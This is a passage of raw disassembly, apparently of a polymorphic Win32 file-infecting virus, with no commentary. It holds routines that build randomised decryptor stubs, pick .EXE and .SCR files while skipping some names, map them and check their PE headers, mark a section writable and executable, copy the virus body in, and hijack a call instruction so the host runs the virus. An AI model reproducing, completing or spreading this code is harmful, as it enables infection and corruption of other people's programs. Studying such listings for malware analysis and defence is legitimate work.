call sub_420154
add edx, 8
xchg edx, ecx
loc_420B5F: ; CODE XREF: sub_420B37:loc_420B9E�j
push 5
pop eax
call sub_420154
cmp dl, 3
jnb short loc_420B77
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_420B9E
; ---------------------------------------------------------------------------
loc_420B77: ; CODE XREF: sub_420B37+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_420B98
mov al, 11h
call sub_420154
mov eax, 1
loc_420B8C: ; CODE XREF: sub_420B37+5D�j
test dl, dl
jz short loc_420B9D
shl eax, 1
dec dl
jmp short loc_420B8C
; ---------------------------------------------------------------------------
jmp short loc_420B9D
; ---------------------------------------------------------------------------
loc_420B98: ; CODE XREF: sub_420B37+47�j
mov eax, 80000000h
loc_420B9D: ; CODE XREF: sub_420B37+57�j
; sub_420B37+5F�j
stosd
loc_420B9E: ; CODE XREF: sub_420B37+3E�j
loop loc_420B5F
retn
sub_420B37 endp
; ---------------------------------------------------------------------------
loc_420BA1: ; CODE XREF: sub_4215FB+112�p
lea edi, [ebp+40343Ch]
test dword ptr ss:loc_403431[ebp], 80000000h
jz short loc_420BB6
mov al, 60h
stosb
loc_420BB6: ; CODE XREF: .data:00420BB1�j
test dword ptr ss:loc_403431[ebp], 1000003h
jz loc_420CBC
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0BDCBB77Ah
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr ss:loc_403431[ebp], 1000000h
mov [ebp+40399Ah], edi
jz short loc_420C34
test dword ptr ss:loc_403431[ebp], 2000000h
mov eax, 36FF6467h
jnz short loc_420BFF
mov eax, 2E8B6467h
loc_420BFF: ; CODE XREF: .data:00420BF8�j
stosd
mov ax, 0
stosw
jz short loc_420C0B
mov al, 5Dh
stosb
loc_420C0B: ; CODE XREF: .data:00420C06�j
test dword ptr ss:loc_403431[ebp], 8000000h
mov eax, 86D8Dh
jnz short loc_420C32
test dword ptr ss:loc_403431[ebp], 4000000h
mov eax, 8C583h
jz short loc_420C32
mov eax, 0F8ED83h
loc_420C32: ; CODE XREF: .data:00420C1A�j
; .data:00420C2B�j
stosd
dec edi
loc_420C34: ; CODE XREF: .data:00420BE7�j
test dword ptr ss:loc_403431[ebp], 3
jz short loc_420C44
mov al, 0E9h
stosb
stosd
loc_420C44: ; CODE XREF: .data:00420C3E�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr ss:loc_403431[ebp], 3
jz short loc_420CBC
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_420B37
mov al, 20h
call sub_420950
jecxz short loc_420CBC
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, dword ptr ss:loc_403431[ebp]
not edx
test edx, 3
jnz short loc_420CAF
call sub_420B37
mov al, 1Fh
call sub_420950
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_420CAF: ; CODE XREF: .data:00420C99�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_420CBC: ; CODE XREF: .data:00420BC0�j
; .data:00420C5B�j ...
test dword ptr ss:loc_403431[ebp], 4
jz short loc_420CDA
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_420CDA: ; CODE XREF: .data:00420CC6�j
test dword ptr ss:loc_403431[ebp], 8
jnz short loc_420D30
cmp byte ptr [ebp+40342Fh], 0
jz short loc_420D30
mov eax, 0C9291829h
or ah, byte ptr ss:loc_40342B[ebp]
shl ah, 3
or ah, byte ptr ss:loc_40342B[ebp]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, byte ptr ss:loc_40342B[ebp]
stosb
mov ax, 0FDE2h
test dword ptr ss:loc_403431[ebp], 10h
jz short loc_420D2E
mov al, 49h
stosb
mov ax, 0FC75h
loc_420D2E: ; CODE XREF: .data:00420D25�j
stosw
loc_420D30: ; CODE XREF: .data:00420CE4�j
; .data:00420CED�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov dword ptr ss:loc_403982[ebp], edi
test dword ptr ss:loc_403431[ebp], 20h
jnz short loc_420D51
mov al, 58h
or al, byte ptr ss:loc_403429[ebp]
stosb
loc_420D51: ; CODE XREF: .data:00420D46�j
mov ax, 0C081h
test dword ptr ss:loc_403431[ebp], 40h
jz short loc_420D64
add ah, 28h
loc_420D64: ; CODE XREF: .data:00420D5F�j
or ah, byte ptr ss:loc_403429[ebp]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr ss:loc_403431[ebp], 40000000h
jnz short loc_420D88
mov al, 50h
add al, byte ptr ss:loc_403429[ebp]
stosb
loc_420D88: ; CODE XREF: .data:00420D7D�j
test dword ptr ss:loc_403431[ebp], 80h
jnz short loc_420D9F
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_420DDC
; ---------------------------------------------------------------------------
loc_420D9F: ; CODE XREF: .data:00420D92�j
mov ax, 1831h
test dword ptr ss:loc_403431[ebp], 100h
jz short loc_420DB1
mov al, 29h
loc_420DB1: ; CODE XREF: .data:00420DAD�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr ss:loc_403431[ebp], 200h
jnz short loc_420DD4
mov ah, 0C8h
loc_420DD4: ; CODE XREF: .data:00420DD0�j
or ah, [ebp+40342Ah]
stosw
loc_420DDC: ; CODE XREF: .data:00420D9D�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr ss:loc_403431[ebp], 8
jz short loc_420E60
test dword ptr ss:loc_403431[ebp], 400h
jnz short loc_420E0B
mov al, 0B8h
or al, byte ptr ss:loc_40342B[ebp]
stosb
jmp short loc_420E58
; ---------------------------------------------------------------------------
loc_420E0B: ; CODE XREF: .data:00420DFE�j
test dword ptr ss:loc_403431[ebp], 800h
jnz short loc_420E28
mov ax, 0E083h
or ah, byte ptr ss:loc_40342B[ebp]
stosw
xor eax, eax
stosb
jmp short loc_420E3D
; ---------------------------------------------------------------------------
loc_420E28: ; CODE XREF: .data:00420E15�j
mov ax, 1829h
or ah, byte ptr ss:loc_40342B[ebp]
shl ah, 3
or ah, byte ptr ss:loc_40342B[ebp]
stosw
loc_420E3D: ; CODE XREF: .data:00420E26�j
test dword ptr ss:loc_403431[ebp], 1000h
mov ax, 0C081h
jz short loc_420E50
add ah, 8
loc_420E50: ; CODE XREF: .data:00420E4B�j
or ah, byte ptr ss:loc_40342B[ebp]
stosw
loc_420E58: ; CODE XREF: .data:00420E09�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_420E60: ; CODE XREF: .data:00420DF2�j
test dword ptr ss:loc_403431[ebp], 40000000h
jz short loc_420E75
mov al, 50h
add al, byte ptr ss:loc_403429[ebp]
stosb
loc_420E75: ; CODE XREF: .data:00420E6A�j
test dword ptr ss:loc_403431[ebp], 2000h
mov al, 86h
jnz short loc_420E85
add al, 4
loc_420E85: ; CODE XREF: .data:00420E81�j
lea ecx, [edi-2]
mov ah, byte ptr ss:loc_403429[ebp]
mov dword ptr ss:loc_40398A[ebp], ecx
stosw
cmp ah, 5
jnz short loc_420EA2
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_420EA2: ; CODE XREF: .data:00420E99�j
test dword ptr ss:loc_403431[ebp], 4000h
mov ax, 3166h
jnz short loc_420EB4
mov ah, 29h
loc_420EB4: ; CODE XREF: .data:00420EB0�j
stosw
mov al, 18h
or al, byte ptr ss:loc_40342B[ebp]
shl al, 3
stosb
mov al, 88h
test dword ptr ss:loc_403431[ebp], 8000h
jnz short loc_420ED2
mov al, 86h
loc_420ED2: ; CODE XREF: .data:00420ECE�j
mov ah, byte ptr ss:loc_403429[ebp]
stosw
cmp ah, 5
jnz short loc_420EE6
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_420EE6: ; CODE XREF: .data:00420EDD�j
test dword ptr ss:loc_403431[ebp], 10000h
jnz short loc_420EFD
mov al, 40h
or al, byte ptr ss:loc_403429[ebp]
stosb
jmp short loc_420F0C
; ---------------------------------------------------------------------------
loc_420EFD: ; CODE XREF: .data:00420EF0�j
mov ax, 0C083h
or ah, byte ptr ss:loc_403429[ebp]
stosw
mov al, 1
stosb
loc_420F0C: ; CODE XREF: .data:00420EFB�j
test dword ptr ss:loc_403431[ebp], 20000h
jnz short loc_420F47
test dword ptr ss:loc_403431[ebp], 40000h
jnz short loc_420F3E
mov al, 0C0h
or al, byte ptr ss:loc_40342B[ebp]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_420F46
; ---------------------------------------------------------------------------
loc_420F3E: ; CODE XREF: .data:00420F22�j
mov al, 40h
or al, byte ptr ss:loc_40342B[ebp]
loc_420F46: ; CODE XREF: .data:00420F3C�j
stosb
loc_420F47: ; CODE XREF: .data:00420F16�j
test dword ptr ss:loc_403431[ebp], 80000h
jnz short loc_420F63
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_420F6B
; ---------------------------------------------------------------------------
loc_420F63: ; CODE XREF: .data:00420F51�j
mov al, 48h
or al, [ebp+40342Ah]
loc_420F6B: ; CODE XREF: .data:00420F61�j
stosb
test dword ptr ss:loc_403431[ebp], 100000h
mov cl, 75h
jnz short loc_420F9F
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub dword ptr ss:loc_40398A[ebp], edi
test dword ptr ss:loc_403431[ebp], 200000h
jnz short loc_420FBA
mov cl, 77h
jmp short loc_420FBA
; ---------------------------------------------------------------------------
loc_420F9F: ; CODE XREF: .data:00420F78�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub dword ptr ss:loc_40398A[ebp], edi
loc_420FBA: ; CODE XREF: .data:00420F99�j
; .data:00420F9D�j
mov al, cl
mov ah, byte ptr ss:loc_40398A[ebp]
stosw
mov al, 58h
add al, byte ptr ss:loc_403429[ebp]
stosb
test dword ptr ss:loc_403431[ebp], 1000003h
jz loc_421064
mov eax, 268B6467h
mov ecx, dword ptr ss:loc_403431[ebp]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_420FFB
mov eax, 2E876467h
loc_420FFB: ; CODE XREF: .data:00420FF4�j
stosd
mov eax, 0
stosw
jnz short loc_42100B
mov ax, 0E58Bh
stosw
loc_42100B: ; CODE XREF: .data:00421003�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr ss:loc_403431[ebp], 1000000h
jnz short loc_421061
test dword ptr ss:loc_403431[ebp], 8000000h
jz short loc_421053
mov ax, 6C8Dh
test dword ptr ss:loc_403431[ebp], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_42104E
mov ax, 424h
stosw
jmp short loc_421061
; ---------------------------------------------------------------------------
loc_42104E: ; CODE XREF: .data:00421044�j
mov al, 8
stosb
jmp short loc_421061
; ---------------------------------------------------------------------------
loc_421053: ; CODE XREF: .data:0042102B�j
mov ax, 5D58h
add al, byte ptr ss:loc_40342B[ebp]
stosw
jmp short loc_421064
; ---------------------------------------------------------------------------
loc_421061: ; CODE XREF: .data:0042101F�j
; .data:0042104C�j ...
mov al, 0C9h
stosb
loc_421064: ; CODE XREF: .data:00420FD7�j
; .data:0042105F�j
test dword ptr ss:loc_403431[ebp], 80000000h
jz short loc_421090
mov al, 7
sub al, byte ptr ss:loc_403429[ebp]
shl eax, 1Ah
or eax, 240889h
add ah, byte ptr ss:loc_403429[ebp]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_421090: ; CODE XREF: .data:0042106E�j
mov ax, 0E0FFh
or ah, byte ptr ss:loc_403429[ebp]
stosw
test dword ptr ss:loc_403431[ebp], 20h
jz short loc_4210FB
test dword ptr ss:loc_403431[ebp], 20000000h
jz short loc_4210C1
loc_4210B4: ; CODE XREF: .data:004210BF�j
test edi, 3
jz short loc_4210C1
mov al, 90h
stosb
jmp short loc_4210B4
; ---------------------------------------------------------------------------
loc_4210C1: ; CODE XREF: .data:004210B2�j
; .data:004210BA�j
mov eax, edi
mov ecx, dword ptr ss:loc_403982[ebp]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, byte ptr ss:loc_403429[ebp]
stosb
test dword ptr ss:loc_403431[ebp], 400000h
jz short loc_4210EF
mov ax, 0C350h
or al, byte ptr ss:loc_403429[ebp]
jmp short loc_4210F9
; ---------------------------------------------------------------------------
loc_4210EF: ; CODE XREF: .data:004210E1�j
mov ax, 0E0FFh
or ah, byte ptr ss:loc_403429[ebp]
loc_4210F9: ; CODE XREF: .data:004210ED�j
stosw
loc_4210FB: ; CODE XREF: .data:004210A6�j
test dword ptr ss:loc_403431[ebp], 1000003h
jz short loc_42117A
test dword ptr ss:loc_403431[ebp], 20000000h
jz short loc_421120
loc_421113: ; CODE XREF: .data:0042111E�j
test edi, 3
jz short loc_421120
mov al, 90h
stosb
jmp short loc_421113
; ---------------------------------------------------------------------------
loc_421120: ; CODE XREF: .data:00421111�j
; .data:00421119�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr ss:loc_403431[ebp], 800000h
jnz short loc_421149
lea eax, loc_403429[ebp]
loc_421141: ; CODE XREF: .data:00421147�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_421141
loc_421149: ; CODE XREF: .data:00421139�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_42115E
mov ax, 0C031h
stosw
loc_42115E: ; CODE XREF: .data:00421156�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_421177
mov ax, 0C031h
stosw
loc_421177: ; CODE XREF: .data:0042116F�j
mov al, 0C3h
stosb
loc_42117A: ; CODE XREF: .data:00421105�j
lea eax, [ebp+40343Ch]
test dword ptr ss:loc_403431[ebp], 10000000h
jnz short loc_421192
push edi
sub edi, eax
pop eax
jmp short loc_4211AB
; ---------------------------------------------------------------------------
loc_421192: ; CODE XREF: .data:0042118A�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add dword ptr ss:loc_403982[ebp], edx
add [ecx], edi
mov eax, [esp+4]
loc_4211AB: ; CODE XREF: .data:00421190�j
mov ss:dword_40106D[ebp], edi
mov edi, [ebp+403986h]
sub eax, dword ptr ss:loc_403982[ebp]
test dword ptr ss:loc_403431[ebp], 40h
jz short loc_4211CB
neg eax
loc_4211CB: ; CODE XREF: .data:004211C7�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_4211CF proc near ; CODE XREF: sub_4215FB+2A8�p
push esi
push edi
cmp dword ptr ss:loc_4039AE[ebp], 0
jz loc_4213B7
call near ptr loc_4211EF+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_4211EF: ; CODE XREF: sub_4211CF+F�p
add bh, bh
sub_4211CF endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_420909
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_420909
mov edi, [ebp+4039A6h]
push esi
call sub_420909
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_4213B7
jz loc_4213B7
add esi, dword ptr ss:loc_4039AA[ebp]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_421388
loc_421269: ; CODE XREF: sub_421388+29�j
lodsb
cmp al, 0E8h
jnz loc_421314
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_420909
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_421297
cmp eax, [edi+0Ch]
jnb loc_4213B0
jmp short loc_4212A3
; ---------------------------------------------------------------------------
loc_421297: ; CODE XREF: sub_421388-FE�j
cmp [ebp+4039A6h], edx
jnz loc_4213B0
loc_4212A3: ; CODE XREF: sub_421388-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_4213B0
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_420909
cmp [ebp+4039A6h], edi
jnz loc_4213B0
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_4213B0
cmp eax, [edi+8]
jnb loc_4213B0
loc_4212EC: ; CODE XREF: sub_421388+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr ss:loc_4039BE[ebp]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_4213C6
jmp loc_4213B0
; ---------------------------------------------------------------------------
loc_421314: ; CODE XREF: sub_421388-11C�j
cmp al, 0FFh
jnz loc_4213B0
cmp byte ptr [esi], 15h
jnz loc_4213B0
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_420909
cmp [ebp+4039A6h], edi
jnz short loc_4213B0
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_42135D
cmp eax, [ebp+4039C6h]
jb short loc_4213C6
loc_42135D: ; CODE XREF: sub_421388-35�j
cmp eax, 70000000h
jb short loc_42139B
call sub_421388
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_421387
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_4213A2
; ---------------------------------------------------------------------------
locret_421387: ; CODE XREF: sub_421388-F�j
retn
; END OF FUNCTION CHUNK FOR sub_421388
; =============== S U B R O U T I N E =======================================
sub_421388 proc near ; CODE XREF: sub_421388-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 00421269 SIZE 0000011F BYTES
pop dword ptr ss:loc_403992[ebp]
pusha
mov esi, [ebp+403972h]
call sub_420A10
popa
loc_42139B: ; CODE XREF: sub_421388-26�j
test eax, 80000000h
jnz short loc_4213B0
loc_4213A2: ; CODE XREF: sub_421388-3�j
sub eax, [edi+0Ch]
jb short loc_4213B0
cmp eax, [edi+8]
jb loc_4212EC
loc_4213B0: ; CODE XREF: sub_421388-F9�j
; sub_421388-EB�j ...
dec ecx
jnz loc_421269
loc_4213B7: ; CODE XREF: sub_4211CF+9�j
; .data:00421251�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_421402
; ---------------------------------------------------------------------------
loc_4213C6: ; CODE XREF: sub_421388-7F�j
; sub_421388-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, dword ptr ss:loc_4039AE[ebp]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_421402: ; CODE XREF: sub_421388+3C�j
pop edi
pop esi
retn
sub_421388 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421405 proc near ; CODE XREF: .data:004215D3�p
; sub_4215FB+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr ss:loc_40357C[ebp]
cmp eax, 0FFFFFFFFh
jz locret_4214D6
mov dword ptr ss:loc_403952[ebp], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_4214D6
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_42198E
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_421982
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_421982
mov dword ptr ss:locret_40396A[ebp], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr ss:loc_403560[ebp]
test eax, eax
jz loc_421982
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_42195A
mov [ebp+403972h], eax
locret_4214D6: ; CODE XREF: sub_421405+10�j
; sub_421405+27�j ...
retn
sub_421405 endp
; =============== S U B R O U T I N E =======================================
sub_4214D7 proc near ; CODE XREF: sub_4215FB+117�p
; sub_4215FB+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr ss:loc_403431[ebp], 10000000h
jnz short loc_4214F1
add eax, ss:dword_40106D[ebp]
loc_4214F1: ; CODE XREF: sub_4214D7+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, ss:dword_40106D[ebp]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov dword ptr ss:loc_403976[ebp], eax
retn
sub_4214D7 endp
; =============== S U B R O U T I N E =======================================
sub_42151C proc near ; CODE XREF: sub_4215FB:loc_42164A�p
; sub_4215FB+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_421521: ; CODE XREF: sub_42151C+23�j
jecxz short locret_421558
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_421558
cmp dword ptr [edx+0Ch], 1
jb short loc_421521
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, dword ptr ss:locret_40396A[ebp]
locret_421558: ; CODE XREF: sub_42151C:loc_421521�j
; sub_42151C+1D�j ...
retn
sub_42151C endp
; =============== S U B R O U T I N E =======================================
sub_421559 proc near ; CODE XREF: .data:004215E5�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_421559 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_421566: ; CODE XREF: .data:00421587�j
mov ecx, edi
jmp short loc_421575
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_421571: ; CODE XREF: .data:00421583�j
mov ebx, edi
xor ecx, ecx
loc_421575: ; CODE XREF: .data:00421568�j
; .data:0042158B�j
lodsb
cmp al, 61h
jb short loc_421580
cmp al, 7Ah
ja short loc_421580
sub al, 20h
loc_421580: ; CODE XREF: .data:00421578�j
; .data:0042157C�j
stosb
cmp al, 5Ch
jz short loc_421571
cmp al, 2Eh
jz short loc_421566
cmp al, 0
jnz short loc_421575
jecxz short locret_421558
mov eax, [ecx]
cmp eax, 455845h
jz short loc_4215A3
cmp eax, 524353h
jnz locret_4214D6
loc_4215A3: ; CODE XREF: .data:00421596�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_4214D6
cmp eax, 4E554357h
jz locret_4214D6
cmp eax, 32334357h
jz locret_4214D6
cmp eax, 4F545350h
jz locret_4214D6
xor ebx, ebx
call sub_421405
jz locret_4214D6
xor edx, edx
call sub_4215FB
call sub_421559
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_421938
; =============== S U B R O U T I N E =======================================
sub_4215FB proc near ; CODE XREF: .data:004215E0�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_421938
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_421938
test dword ptr [ebx+16h], 2000h
jnz loc_421938
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_421938
jecxz short loc_42164A
cmp ecx, 101h
jbe loc_421938
loc_42164A: ; CODE XREF: sub_4215FB+41�j
call sub_42151C
jb loc_421938
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_420154
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_421674: ; CODE XREF: sub_4215FB+92�j
push 20h
dec cl
pop eax
js short loc_42168F
call sub_420154
test edx, edx
setz dl
shl edx, cl
xor dword ptr ss:loc_403431[ebp], edx
jmp short loc_421674
; ---------------------------------------------------------------------------
loc_42168F: ; CODE XREF: sub_4215FB+7E�j
; sub_4215FB+CD�j ...
push 6
pop ecx
loc_421695: ; CODE XREF: sub_4215FB+B8�j
push 6
pop eax
call sub_420154
mov al, byte ptr ss:loc_403429[ebp]
xchg al, byte ptr ds:loc_403429[edx+ebp]
mov byte ptr ss:loc_403429[ebp], al
loop loc_421695
test dword ptr ss:loc_403431[ebp], 8
jnz short loc_4216CA
cmp byte ptr ss:loc_40342B[ebp], 1
jz short loc_42168F
loc_4216CA: ; CODE XREF: sub_4215FB+C4�j
test dword ptr ss:loc_403431[ebp], 1000003h
jz short loc_4216F1
cmp byte ptr ss:loc_403429[ebp], 5
jz short loc_42168F
cmp byte ptr [ebp+40342Ah], 5
jz short loc_42168F
cmp byte ptr ss:loc_40342B[ebp], 5
jz short loc_42168F
loc_4216F1: ; CODE XREF: sub_4215FB+D9�j
test dword ptr ss:loc_403431[ebp], 80000000h
jz short loc_421706
cmp byte ptr ss:loc_403429[ebp], 2
ja short loc_42168F
loc_421706: ; CODE XREF: sub_4215FB+100�j
and dword ptr ss:loc_4039AE[ebp], 0
call loc_420BA1
call sub_4214D7
call sub_421941
mov ebx, dword ptr ss:loc_403976[ebp]
call sub_421405
jz loc_421938
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_42151C
jb loc_421938
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr ss:loc_403431[ebp], 10000000h
jnz short loc_42176E
lea esi, [ebp+40343Ch]
mov ecx, ss:dword_40106D[ebp]
rep movsb
loc_42176E: ; CODE XREF: sub_4215FB+163�j
push edi
mov ecx, 90Fh
lea esi, dword_401000[ebp]
rep movsd
mov cl, 0
jecxz short loc_421782
rep movsb
loc_421782: ; CODE XREF: sub_4215FB+183�j
test dword ptr ss:loc_403431[ebp], 10000000h
jz loc_42183A
push dword ptr [ebx+28h]
call sub_420909
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_42183A
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_4217BF
xor ecx, ecx
loc_4217BF: ; CODE XREF: sub_4215FB+1C0�j
add esi, [edx+14h]
cmp ecx, ss:dword_40106D[ebp]
mov ecx, ss:dword_40106D[ebp]
jb short loc_421826
mov edi, [esp+14h+var_14]
and ss:dword_40106D[ebp], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr ss:loc_403431[ebp], 40h
jz short loc_4217FF
neg dword ptr [eax]
loc_4217FF: ; CODE XREF: sub_4215FB+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov dword ptr ss:loc_4039AE[ebp], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr ss:loc_403431[ebp], 40h
jz short loc_42181D
neg dword ptr [eax]
loc_42181D: ; CODE XREF: sub_4215FB+21E�j
push ecx
call sub_4214D7
pop ecx
jmp short loc_421832
; ---------------------------------------------------------------------------
loc_421826: ; CODE XREF: sub_4215FB+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_421832: ; CODE XREF: sub_4215FB+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_42183A: ; CODE XREF: sub_4215FB+191�j
; sub_4215FB+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_421853
imul edx, 12345678h
loc_421853: ; CODE XREF: sub_4215FB+250�j
mov [eax-1], dl
call sub_41F827
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr ss:loc_403431[ebp], 10000000h
lea eax, [ecx+6]
jnz short loc_421884
mov dword ptr ss:loc_4039AE[ebp], ecx
add eax, ss:dword_40106D[ebp]
and dword ptr [edi+6Dh], 0
loc_421884: ; CODE XREF: sub_4215FB+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr ss:loc_403431[ebp], 80000000h
jz short loc_4218A9
push edx
call sub_4211CF
pop edx
loc_4218A9: ; CODE XREF: sub_4215FB+2A5�j
mov ecx, dword ptr ss:loc_4039AE[ebp]
jecxz short loc_4218B4
